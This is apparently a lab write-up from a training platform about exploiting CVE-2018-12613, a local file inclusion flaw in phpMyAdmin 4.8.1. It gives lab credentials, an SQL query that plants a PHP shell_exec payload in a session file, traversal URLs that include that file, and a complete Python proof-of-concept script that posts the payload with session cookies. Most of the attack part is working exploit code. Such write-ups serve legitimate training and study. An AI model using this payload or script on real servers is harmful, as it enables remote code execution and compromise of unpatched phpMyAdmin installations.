AttackDefense.com [LFI] - CVE-2018-12613 Exploit
Mission
An attacker might get administrative access to a web application. However, this does not automatically mean that the web server can be compromised. In cases where a SaaS application is made available to users, it is routine to give each user admin access to his own instance of the web application e.g. a managed hosted Wordpress site. In such scenario, the attacker who will begin accessing the application as a managed administrative user will have to figure out how to exploit the administrative interface to get a shell on the server. In some cases, it might be possible to do privilege escalation as well.
In the exercise below, the attacker has administrative access to the web application and needs to find a local file inclusion attack to get important files from the server.
PHPMyAdmin is a free and open source web based administration tool for MySQL and MariaDB. It is developed in PHP and Javascript.
PHPMyAdmin (4.8.1) is vulnerable to a Local File Inclusion documented in CVE-2018-12613.
The following username and passwords may be used to explore the application and/or find a vulnerability which might require authenticated access:
- Username: pentester
- Password: password1
Objective: Your task is to find and exploit this vulnerability.
Level difficulty: Intermediate
Category: Webapps CVEs > Local File Inclusion
Solution
At first, I was provided with the PHPMyAdmin web application with a functional user account and password. PHPMyAdmin is a free and open source administration tool for MySQL and MariaDB. As a portable web application written primarily in PHP, it has become one of the most popular MySQL administration tools, especially for web hosting services. Using the provided credentials, I authenticated in the administrative panel of the application.
After performing an research of the application version, I discovered the following public exploit description:
One of the main functionality of PHPMyAdmin (4.8.1) is to execute SQL Queries. We can use the following form:
According to the exploit description, we can both create cache files of all commands executed within a session and also include those files in order to execute malicious code. Here is my example of the payload:
1
select '<?php $output = shell_exec("ls -al; date; id;");echo "<pre>$output</pre>";exit;?>'
We can include the cache file in order to execute our malicious code as such:
All good, the challenge is complete! I decided to create this PoC as there was no one publicly available exploit at the moment of this article. Here is my Python exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
VALID_PHPMYADMIN_URL = "http://byk4piiac0ltnaqgssdnhrjdr.public1.attackdefenselabs.com:80"
VALID_PHPMYADMIN_SESSION = "5s02743ikru46a31086rrjr8jras81jq"
burp0_url = VALID_PHPMYADMIN_URL + "/import.php"
burp0_cookies = {"phpMyAdmin": VALID_PHPMYADMIN_SESSION, "pma_lang": "en", "pmaUser-1": "%7B%22iv%22%3A%22N2lLHGoe2cuUN5uvAbz8ww%3D%3D%22%2C%22mac%22%3A%222b02670d8802823d99c3ccaf1f0ece9f2eb4c536%22%2C%22payload%22%3A%22mR69lSBATnU%2B%2Bs5jL0c3yw%3D%3D%22%7D", "pmaAuth-1": "%7B%22iv%22%3A%22xoIEoAgAvAxL%5C%2F%5C%2Fa3c0iX8Q%3D%3D%22%2C%22mac%22%3A%22243d87482efacdde27e3d2a6c6e85ae3b903af66%22%2C%22payload%22%3A%22yl27EG%5C%2FIUngUnyZIKNa8O45enMc8iZyHjFpLmiDkWSs%3D%22%7D"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
burp0_data={"is_js_confirmed": "0", "token": "?[I568P@ei7B?OUd", "pos": "0", "goto": "server_sql.php", "message_to_show": "Your SQL query has been executed successfully.", "prev_sql_query": '', "sql_query": "select '<?php $output = shell_exec(\"ls -al; date; id;\");echo \"<pre>$output</pre>\";exit;?>'", "sql_delimiter": ";", "show_query": "1", "fk_checks": "0", "fk_checks": "1", "SQL": "Go", "ajax_request": "true", "ajax_page_request": "true", "_nocache": "1543255823534938840", "token": "?[I568P@ei7B?OUd"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
print "While autentificated:"
print "- Please check: " + VALID_PHPMYADMIN_URL + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_" + VALID_PHPMYADMIN_SESSION
print "- Please check: " + VALID_PHPMYADMIN_URL + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php5/sess_" + VALID_PHPMYADMIN_SESSION
